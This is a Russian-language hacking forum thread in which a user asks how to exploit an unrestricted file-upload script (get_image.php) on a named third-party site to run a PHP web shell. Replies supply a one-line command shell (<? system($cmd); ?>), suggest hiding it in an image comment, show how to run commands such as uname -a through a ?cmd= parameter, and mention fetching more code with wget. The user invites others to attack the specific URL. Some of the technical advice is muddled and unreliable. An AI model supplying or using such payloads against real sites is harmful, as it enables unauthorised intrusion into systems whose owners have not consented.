На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..

Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.

Все файлы появляются в папке /www.site.ru/img/

Какие есть варианты? :)

залил.
После нажати я на кнопку добавить как и обычно вылелтел адресок куда все зелетело.
Выдалось http://..ru/img/1147031229.jpg
Нажимаю ничего не происходит..хотя через Ie он выдает текст shella
Что мне с ним делать?

Вот по хорошему его как нить залить в другую папку..через этот get_image.php
Какие мысли еще, народ?

Если нужно то могу этот исходничек get_image.php осветить.

Попробуй
http://site.ru/index.php?cmd="php shell.jpg"

Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..

Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..
Это я предлогал но моё сообщение пропало куда то(
Вообщем команды там будут типа http://site.ru/img/fail.php?cmd= и тут команда типа uname -a воть а залить моно так ls -la

а залить моно так ls -la

Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись

К сожалению или к счастью у меня нет огромного опыта в этих делах..дабы поэтому и спрашивал.
Можно мне написать подробно на счет fail.php?cmd=...(так как пока мне не покажешь..черт побери я так и не пойму..)
Заранее благодарен.
Я хотел бы научится, да вот только не знаю что да где..

djhoof статей по етомe поводу уйма почитай немного!!!
Можно мне написать подробно на счет fail.php?cmd=...
Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда

Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись
нда я вижу вы богаты знаниями ))
Вообще то wget это для виндовс но если я с ls -la ошибся тогда cat 100% подходит!
А насчет file.php?cmd=
file.php твой файл
?cmd= запрос
Какие команды туда вводить? Смотря какая система если системы виндовс то некоторые команды можешь посмотреть в cmd> help если unix то поищи в google.ru !

Попробовал..опять пишет, что права нужны..
/img/1147031229.php?cmd=ls -la

Что там еще..

http://sait.ru/img/1147007150.php?cmd=uname -a
Так тоже не че не получается..

А на счет залить через "wget сцылка"
Я просто не понял.=)

нда я вижу вы богаты знаниями ))
Вообще то wget это для виндовс
Да уж куда мне до вас кул хацкеров )))))) типа на линухе wget нету да??

Парни..попробуйте че нить сделать
http://www.modnoblya.h15.ru/get_image.php
А то что то у меня голова от всего этого сейчас лопнет...
Этот сайт..просто ключик к другому..

Думаю совместными усилиями можно что-нить придумать..

Да уж куда мне до вас кул хацкеров )))))) типа на линухе wget нету да??
Есть но там если не ошибаюсь ему замена команда CAT )

А потом расскажите как да что..просто сам тоже хочу попробовать..))
А то никакого удовольствия..)

неужели некому помочь?

Попробуй
http://site.ru/index.php?cmd="php shell.jpg"

Это по идеи работает, но к сожалению там вылетает такая вот надпись - The html tags you attempted to use are not allowed

Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда
Короче я беру shell.php в него вставляю эту строчку в самый верх <? system($cmd); ?>, так???
заливаю shell и пробую его открыть через http://site.ru/img/fail.php?cmd=команда
Что там за команды должны быть..

Я че то видимо отдален от всего этого..но мне все же интересно.

Когда заливаешь туда файл расширение сразу меняеться на gif. А ты запускаешь файл php. У тебя наверно не фига не получиться.

Такс..опять мне не понятно какой файл где там что меняется..=((
Может какой нить добрый чел покажет мне как это надо все правильно делать..
http://www.modnoblya.h15.ru/get_image.php - вот тут этот файл..блин..
Заранее благодарен.